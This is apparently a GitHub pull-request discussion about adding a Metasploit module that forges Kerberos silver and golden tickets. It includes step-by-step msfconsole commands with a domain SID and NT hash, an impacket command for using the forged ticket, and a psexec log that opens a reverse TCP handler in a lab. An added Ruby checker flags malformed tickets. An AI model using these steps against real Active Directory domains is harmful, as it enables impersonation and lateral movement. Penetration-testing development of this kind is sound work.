
Add Silver and Golden ticket forging module

Open dwelch-r7 opened this issue 2 years ago • 1 comments

Updates the Kerberos data model to support the encrypted ticket part; this PR is the start of adding full support for silver/golden ticket creation.

Next steps will be to add support for encryption on the encrypted part and integrating it with the existing ticket model

Verification

  • [ ] Tests pass
  • [ ] Start msfconsole
  • [ ] Do: use auxiliary/admin/kerberos/forge_kerberos_ticket
  • [ ] Do: set DOMAIN DW.LOCAL
  • [ ] Do: set DOMAIN_SID S-1-5-21-1755879683-3641577184-3486455962
  • [ ] Do: set NTHASH 88E4D9FABAECF3DEC18DD80905521B29
  • [ ] Do: set USER fake_user
  • [ ] Do: set SPN MSSqlSvc/dc1.dw.local:1433 (Option only used for silver tickets)
  • [ ] Do: silver to generate a silver ticket or golden for a golden ticket
  • [ ] Use your ticket which will have been stored as loot with your chosen target
  • [ ] Example usage in impacket:
    export KRB5CCNAME=/path/to/ticket
    python3 mssqlclient.py DW.LOCAL/[email protected] -k -no-pass
    

dwelch-r7 avatar Jun 23 '22 12:06 dwelch-r7

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

github-actions[bot] avatar Jul 15 '22 15:07 github-actions[bot]

After generating the golden ticket and inspecting it, it looks like the timestamps are missing.

{:client=>
  {:name_type=>1,
   :count_of_components=>1,
   :realm=>"MSFLAB.LOCAL",
   :components=>["smcintyre"]},
 :server=>
  {:name_type=>1,
   :count_of_components=>1,
   :realm=>"MSFLAB.LOCAL",
   :components=>["smcintyre"]},
 :keyblock=>{:enctype=>23, :data=>"cc121803584567e2"},
 :authtime=>1969-12-31 19:00:00 -0500,
 :starttime=>1969-12-31 19:00:00 -0500,
 :endtime=>1969-12-31 19:00:00 -0500,
 :renew_till=>1969-12-31 19:00:00 -0500,
 :is_skey=>false,
 :ticket_flags=>1356857344,
 :address_count=>0,
 :addresses=>[],
 :authdata_count=>0,
 :authdatas=>[],
 :second_ticket=>""}

Also given that a golden ticket is a TGT, the server components should be krbtgt/MSFLAB.LOCAL right?

Yup, absolutely right on both counts; minor typos, easy fix. Nice spot.

dwelch-r7 avatar Aug 25 '22 23:08 dwelch-r7
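The two defects spotted in the dump above (epoch timestamps and a TGT whose server principal is not krbtgt/REALM) are cheap to check mechanically, both when validating a module's output and when triaging a ccache found on a host. The following is an added example, not code from the PR or from the framework: a sanity checker over the same hash shape the dump uses, with a constructed sample modelled on that dump and the corrected form beside it. The 10-hour lifetime threshold is an assumption (the AD default TGT lifetime), not something the thread states.

```ruby
EPOCH = Time.at(0)

# Constructed sample modelled on the golden-ticket dump quoted in the review
# comment above: every timestamp is still the Unix epoch and the server
# principal was copied from the client instead of being krbtgt/REALM.
BROKEN_TGT = {
  client: { realm: 'MSFLAB.LOCAL', components: ['smcintyre'] },
  server: { realm: 'MSFLAB.LOCAL', components: ['smcintyre'] },
  keyblock: { enctype: 23, data: 'cc121803584567e2' },
  authtime: EPOCH, starttime: EPOCH, endtime: EPOCH, renew_till: EPOCH
}

# The same entry after the fix: real times and a krbtgt server principal.
now = Time.utc(2022, 8, 25, 12, 0, 0)
FIXED_TGT = BROKEN_TGT.merge(
  server: { realm: 'MSFLAB.LOCAL', components: ['krbtgt', 'MSFLAB.LOCAL'] },
  authtime: now, starttime: now, endtime: now + 10 * 3600, renew_till: now + 7 * 86_400
)

# Returns a list of problems found in one ccache credential entry.
# tgt:          whether the entry is expected to be a TGT (golden ticket)
# max_lifetime: longest plausible endtime - starttime in seconds; 10 hours is
#               the AD default TGT lifetime (assumed threshold, tune per domain)
def ticket_sanity_issues(cred, tgt:, max_lifetime: 10 * 3600)
  issues = []
  %i[authtime starttime endtime renew_till].each do |k|
    issues << "#{k} is unset (Unix epoch)" if cred[k].nil? || cred[k] == EPOCH
  end
  if issues.empty? # ordering checks only make sense on real timestamps
    issues << 'endtime is not after starttime' if cred[:endtime] <= cred[:starttime]
    issues << 'lifetime exceeds max_lifetime' if cred[:endtime] - cred[:starttime] > max_lifetime
    issues << 'renew_till is before endtime' if cred[:renew_till] < cred[:endtime]
  end
  if tgt
    expected = ['krbtgt', cred[:server][:realm]]
    got = cred[:server][:components]
    issues << "TGT server should be #{expected.join('/')}, got #{got.join('/')}" unless got == expected
  end
  issues << 'client and server principals are identical' if cred[:client] == cred[:server]
  issues
end

if __FILE__ == $PROGRAM_NAME
  puts "broken: #{ticket_sanity_issues(BROKEN_TGT, tgt: true).inspect}"
  puts "fixed:  #{ticket_sanity_issues(FIXED_TGT, tgt: true).inspect}"
end
```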

Alright, so the changes look good to me now, thanks @dwelch-r7! I tested that both silver and golden tickets work with impacket. When a golden ticket is used, there's KRB traffic to get the TGS and it works. When the silver ticket is used, it works without any KRB traffic.

The golden ticket does not work with Metasploit because the cache reuse only supports TGS. This is something I should fix, but in a different PR. The silver ticket however does work with metasploit, as confirmed by making one for the CIFS server and then running the psexec module.

@adfoster-r7 are you comfortable with me landing this or do you still have any outstanding concerns?

smcintyre-r7 avatar Aug 30 '22 17:08 smcintyre-r7

Not a blocker; when testing I ran into an issue with kerberos + smb. My inline creds were ignored and a ccache file was used implicitly, and it wasn't clear, from a user's perspective, how to make metasploit not do that.

msf6 exploit(windows/smb/psexec) > run smb://Administrator:[email protected] smbauth=kerberos smbrhostname=dc3.adf3.local domaincontrollerrhost=192.168.123.13 smbdomain=adf3.local

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.13:445 - Connecting to the server...
[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|adf3.local as user 'Administrator'...
[*] 192.168.123.13:445 - 192.168.123.13:88 - Using cached credential for cifs/dc3.adf3.local Administrator
[-] 192.168.123.13:445 - Exploit failed [no-access]: RubySMB::Error::UnexpectedStatusCode The server responded with an unexpected status code: STATUS_ACCESS_DENIED
[*] Exploit completed, but no session was created.

i.e. There was no option to opt out of the default ccache reuse functionality, it also didn't invalidate the ccache file, or fall back to trying others.

adfoster-r7 avatar Sep 01 '22 12:09 adfoster-r7

Release Notes

Adds a new auxiliary/admin/kerberos/forge_ticket module for forging silver and golden Kerberos tickets

adfoster-r7 avatar Sep 02 '22 10:09 adfoster-r7